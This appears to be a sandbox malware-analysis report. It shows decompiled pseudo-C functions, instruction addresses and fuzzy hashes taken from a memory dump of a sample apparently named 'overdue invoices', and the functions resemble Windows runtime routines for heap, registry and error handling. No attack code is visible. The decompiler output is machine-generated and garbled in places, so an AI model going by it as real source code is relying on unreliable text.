                  0x009cd2fa
                  0x009cd302
                  0x009cd303
                  0x009cd30b
                  0x009cd30f
                  0x009cd313
                  0x009cd318
                  0x009cd31c
                  0x009cd320
                  0x009cd379
                  0x009cd37d
                  0x00000000
                  0x00000000
                  0x00a0affe
                  0x00a0b001
                  0x00a0b011
                  0x00000000
                  0x009cd322
                  0x009cd322
                  0x009cd330
                  0x009cd337
                  0x009cd35d
                  0x009cd339
                  0x009cd33f
                  0x009cd38c
                  0x009cd38c
                  0x009cd33f
                  0x009cd349
                  0x00000000
                  0x009cd349

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: @
                  • API String ID: 0-2766056989
                  • Opcode ID: 4e620106c788b8d76aaba481af0c80f0d9c1c0801faf2f6be8045bd4409bd58c
                  • Instruction ID: 3a7344b011290bde342a51a15df7191e5efe2f9ddc06ce7876293f6457da6959
                  • Opcode Fuzzy Hash: 4e620106c788b8d76aaba481af0c80f0d9c1c0801faf2f6be8045bd4409bd58c
                  • Instruction Fuzzy Hash: 50319EB19493859FC711DF28C981EABBBE8EBC5758F10092EF99483251D634DD04DBA3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009A1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E009A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E009DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E009DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E009DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L009B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                  0x009a1b8f
                  0x009a1b9a
                  0x009a1b9c
                  0x009a1b9e
                  0x009a1ba3
                  0x009f7010
                  0x009f7010
                  0x00000000
                  0x009a1ba9
                  0x009a1ba9
                  0x009a1bae
                  0x00000000
                  0x009a1bc5
                  0x009a1bca
                  0x009a1bcf
                  0x009a1bd0
                  0x009a1bd1
                  0x009a1bd2
                  0x009a1bd6
                  0x009a1bdc
                  0x009a1be0
                  0x009f6ffc
                  0x009f7000
                  0x00000000
                  0x009f7006
                  0x009f7009
                  0x009f7009
                  0x009a1be6
                  0x009a1bec
                  0x009a1c0b
                  0x009a1c0b
                  0x009a1c0c
                  0x009a1c11
                  0x009a1c12
                  0x009a1c15
                  0x009a1c1b
                  0x009a1c1f
                  0x009a1c31
                  0x009a1c33
                  0x009f7026
                  0x009f7026
                  0x009a1c21
                  0x009a1c24
                  0x009a1c24
                  0x009a1bee
                  0x009a1bee
                  0x009a1bf2
                  0x009a1c3a
                  0x009a1bf4
                  0x009a1bf4
                  0x009a1c05
                  0x009a1c05
                  0x009a1c09
                  0x009a1c3e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009a1c09
                  0x009a1bec
                  0x009a1be0
                  0x009a1bae
                  0x009a1c2e

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: WindowsExcludedProcs
                  • API String ID: 0-3583428290
                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                  • Instruction ID: 202bd547f67924ca552994ba3d78b0257ee8a0f3ba4eb72dd9aa023709de6a03
                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                  • Instruction Fuzzy Hash: 8621AA76541228ABDB219A95C940F6BF77DEF92760F1A4426FD449B200DA34DD00D7E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A48DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00A48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xa70d50);
				E009ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					L00A25720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L009EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L009EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E009ED130(_t34, _t39, _t40);
			}





                  0x00a48df1
                  0x00a48df1
                  0x00a48df1
                  0x00a48df1
                  0x00a48df1
                  0x00a48df1
                  0x00a48df3
                  0x00a48df8
                  0x00a48dfd
                  0x00a48e00
                  0x00a48e0e
                  0x00a48e2a
                  0x00a48e36
                  0x00a48e38
                  0x00a48e3c
                  0x00a48e46
                  0x00a48e46
                  0x00a48e36
                  0x00a48e50
                  0x00a48e56
                  0x00a48e59
                  0x00a48e5c
                  0x00a48e60
                  0x00a48e67
                  0x00a48e6d
                  0x00a48e73
                  0x00a48e74
                  0x00a48eb1
                  0x00a48ebd

                  Strings
                  • Critical error detected %lx, xrefs: 00A48E21
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: Critical error detected %lx
                  • API String ID: 0-802127002
                  • Opcode ID: 9a2c0ac129b52aa0fb117ca3efe61f5ae12e639b4a43cc75ca74cc1006555eee
                  • Instruction ID: 7086c6ec57c020577e2e1cb2aedc281f6a8b3b690dad0cd3afb9118380e9eeba
                  • Opcode Fuzzy Hash: 9a2c0ac129b52aa0fb117ca3efe61f5ae12e639b4a43cc75ca74cc1006555eee
                  • Instruction Fuzzy Hash: 38118B75D05348EBDF25DFA995067ACBBB0BB44714F30422DE428AB282C7388A01CF14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A65BA5 Relevance: .6, Instructions: 592COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00A65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xa71178);
				E009ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00A64C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E009DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00A65542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xa860e8;
								if( *0xa860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xa860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E009D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E009D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E009DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E009DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E009DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E009DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E009DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E009DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E009DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00A64CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E009ED130(_t427, _t494, _t511);
				}
			}










































































                  0x00a65ba5
                  0x00a65baa
                  0x00a65baf
                  0x00a65bb4
                  0x00a65bb6
                  0x00a65bbc
                  0x00a65bbe
                  0x00a65bc4
                  0x00a65bcd
                  0x00a65bd3
                  0x00a65bd6
                  0x00a65bdc
                  0x00a65be0
                  0x00a65be3
                  0x00a65beb
                  0x00a65bf2
                  0x00a65bf8
                  0x00a65bfe
                  0x00a65c04
                  0x00a65c0e
                  0x00a65c18
                  0x00a65c1f
                  0x00a65c25
                  0x00a65c2a
                  0x00a65c2c
                  0x00a65c32
                  0x00a65c3a
                  0x00a65c3f
                  0x00a65c42
                  0x00a65c48
                  0x00a65c5b
                  0x00a65c5b
                  0x00a65c2c
                  0x00a65cb7
                  0x00a65cb9
                  0x00a65cbf
                  0x00a65cc2
                  0x00a65cca
                  0x00a65ccb
                  0x00a65ccb
                  0x00a65cd1
                  0x00a65cd7
                  0x00a65cda
                  0x00a65ce1
                  0x00a65ce4
                  0x00a65ce7
                  0x00a65ced
                  0x00a65cf3
                  0x00a65cf9
                  0x00a65cff
                  0x00a65d08
                  0x00a65d0a
                  0x00a65d0e
                  0x00a65d10
                  0x00000000
                  0x00000000
                  0x00a65d16
                  0x00a65d1a
                  0x00000000
                  0x00000000
                  0x00a65d20
                  0x00a65d22
                  0x00a65d25
                  0x00a65d2f
                  0x00a65d2f
                  0x00a65d33
                  0x00a65d3d
                  0x00a65d49
                  0x00a65d4b
                  0x00000000
                  0x00000000
                  0x00a65d5a
                  0x00a65d5d
                  0x00a65d60
                  0x00000000
                  0x00000000
                  0x00a65d66
                  0x00a65d69
                  0x00000000
                  0x00000000
                  0x00a65d6f
